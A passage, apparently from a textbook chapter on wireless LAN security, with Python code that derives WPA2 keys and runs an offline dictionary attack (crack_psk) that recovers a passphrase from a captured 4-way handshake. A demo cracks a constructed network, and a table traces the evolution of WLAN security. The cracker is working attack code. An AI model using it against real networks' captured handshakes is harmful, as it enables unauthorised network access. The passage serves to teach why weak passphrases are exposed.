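    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid, 4096, 32)


def ieee80211i_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... and truncate."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return ieee80211i_prf(pmk, b"Pairwise key expansion", data, PTK_LEN_CCMP)


def eapol_key_frame(key_info: int, replay_counter: int, nonce: bytes,
                    mic: bytes = b"\x00" * 16, key_data: bytes = b"") -> bytes:
    """802.1X EAPOL-Key frame with the RSN (type 2) key descriptor. Field order after the 4-byte
    EAPOL header: descriptor type, key info, key length, replay counter, nonce, IV, RSC, ID, MIC, key data."""
    body = (struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + nonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic
            + struct.pack(">H", len(key_data)) + key_data)
    return struct.pack(">BBH", 2, 3, len(body)) + body    # EAPOL version 2, packet type 3 = EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): HMAC-SHA1 over the frame with the MIC field zeroed, first 16 bytes."""
    zeroed = frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + frame[EAPOL_MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
              captured_msg2: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: SSID, MACs and nonces are visible in the capture, so each
    candidate passphrase is verified by recomputing the MIC of the captured frame."""
    expected = captured_msg2[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa_ptk(wpa_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured_msg2), expected):
            return candidate
    return None


# Constructed scenario: a small network protected by a weak passphrase.
SSID = b"CorpWiFi"
AP_MAC, CLIENT_MAC = bytes.fromhex("020000000001"), bytes.fromhex("020000000010")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))   # fixed for reproducibility; random in practice
TRUE_PASSPHRASE = "summer2007"
MSG2_KEY_INFO = 0x010A      # descriptor version 2, pairwise key, MIC present


def captured_handshake_msg2(passphrase: str = TRUE_PASSPHRASE) -> bytes:
    """Message 2 of the 4-way handshake (client to AP, carrying SNonce) as the client would send it."""
    kck = wpa_ptk(wpa_pmk(passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    unsigned = eapol_key_frame(MSG2_KEY_INFO, 1, SNONCE)
    return eapol_key_frame(MSG2_KEY_INFO, 1, SNONCE, mic=eapol_mic(kck, unsigned))


def demo() -> Optional[str]:
    wordlist = ["password", "letmein", "summer2007", "Tr0ub4dor&3"]
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, captured_handshake_msg2(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The 4096-iteration PBKDF2 makes each guess cost a few thousand SHA-1 operations, which slows a dictionary attack but does not stop it; only a long, random passphrase (or 802.1X with per-user credentials, as the section recommends) removes the exposure.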

Table 9-2 summarizes the WLAN security evolution.

Table 9-2: Evolution of WLAN Security

  Initial   WEP: No strong authentication, static keys, first-generation encryption, not scalable

  Interim   802.1X and WPA: Strong, user-based authentication, dynamic keys, improved encryption

  Present   Wireless intrusion detection system (IDS): Identify and protect against attacks
            802.1X, 802.11i/WPA2: Strong, user-based authentication, dynamic key management, AES encryption

  Future    Improvements to hashing algorithms and key management in conjunction with AES


